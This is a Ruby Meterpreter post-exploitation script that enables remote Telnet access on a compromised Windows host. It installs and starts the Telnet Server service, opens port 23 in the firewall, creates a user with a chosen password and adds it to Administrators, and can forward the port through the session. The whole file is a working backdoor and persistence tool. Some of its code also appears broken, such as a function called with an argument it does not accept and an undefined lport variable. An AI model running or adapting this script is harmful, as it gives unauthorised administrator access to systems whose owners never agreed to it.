# $Id$ # $Revision$ # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @client = client host_name = client.sys.config.sysinfo['Computer'] # Create Filename info to be appended to downloaded files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for the logs logs = ::File.join(Msf::Config.log_directory,'scripts', 'gettelnet') # Create the log directory ::FileUtils.mkdir_p(logs) # Cleaup script file name @dest = logs + "/clean_up_" + filenameinfo + ".rc" session = client @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-e" => [ false, "Enable Telnet Server only." ], "-p" => [ true, "The Password of the user to add." ], "-u" => [ true, "The Username of the user to add." ], "-f" => [ true, "Forward Telnet Connection." ] ) def checkifinst() # This won't work on windows 2000 since there is no sc.exe print_status("Checking if Telnet is installed...") begin registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\","Start") return true rescue return false end end #--------------------------------------------------------------------------------------------------------- def insttlntsrv() trgtos = @client.sys.config.sysinfo['OS'] if trgtos =~ /Vista|7|2008/ puts("Checking if Telnet Service is Installed") if checkifinst() print_status("Telnet Service Installed on Target") else print_status("Installing Telnet Server Service ......") cmd_exec("cmd /c ocsetup TelnetServer") prog2check = "ocsetup.exe" found = 0 while found == 0 @client.sys.process.get_processes().each do |x| found =1 if prog2check == (x['name'].downcase) puts "*" sleep(0.5) found = 0 end end end file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"") print_status("Finished installing the Telnet Service.") end elsif trgtos =~ /2003/ file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"") end end #--------------------------------------------------------------------------------------------------------- def enabletlntsrv() key2 = "HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\" value2 = "Start" begin v2 = registry_getvaldata(key2,value2) print_status "Setting Telnet Server Services service startup mode" if v2 != 2 print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] cmmds. each do |cmd| cmd_exec(cmd) end else print_status "\tTelnet Server Services service is already set to auto" end # Enabling Exception on the Firewall print_status "\tOpening port in local firewall if necessary" cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable') rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end end #--------------------------------------------------------------------------------------------------------- def addrdpusr(username, password) print_status "Setting user account for logon" print_status "\tAdding User: #{username} with Password: #{password}" begin cmd_exec("net user #{username} #{password} /add") file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"") print_status "\tAdding User: #{username} to local group TelnetClients" cmd_exec("net localgroup \"TelnetClients\" #{username} /add") print_status "\tAdding User: #{username} to local group Administrators" cmd_exec("net localgroup Administrators #{username} /add") print_status "You can now login with the created user" rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end end #--------------------------------------------------------------------------------------------------------- def message print_status "Windows Telnet Server Enabler Meterpreter Script" end def usage print_line("Windows Telnet Server Enabler Meterpreter Script") print_line("Usage: gettelnet -u -p ") print_line(@@exec_opts.usage) raise Rex::Script::Completed end ################## MAIN ################## # Parsing of Options usr = nil pass = nil frwrd = nil enbl = nil @@exec_opts.parse(args) { |opt, idx, val| case opt when "-u" usr = val when "-p" pass = val when "-h" usage when "-f" frwrd = true when "-e" enbl = true end } if enbl message insttlntsrv(session) enabletlntsrv() print_status("For cleanup use command: run multi_console_command -rc #{@dest}") elsif usr!= nil && pass != nil message insttlntsrv(session) enabletlntsrv() addrdpusr(usr, pass) print_status("For cleanup use command: run multi_console_command -rc #{@dest}") else usage end if frwrd == true print_status("Starting the port forwarding at local port #{lport}") client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 23 -r 127.0.0.1") end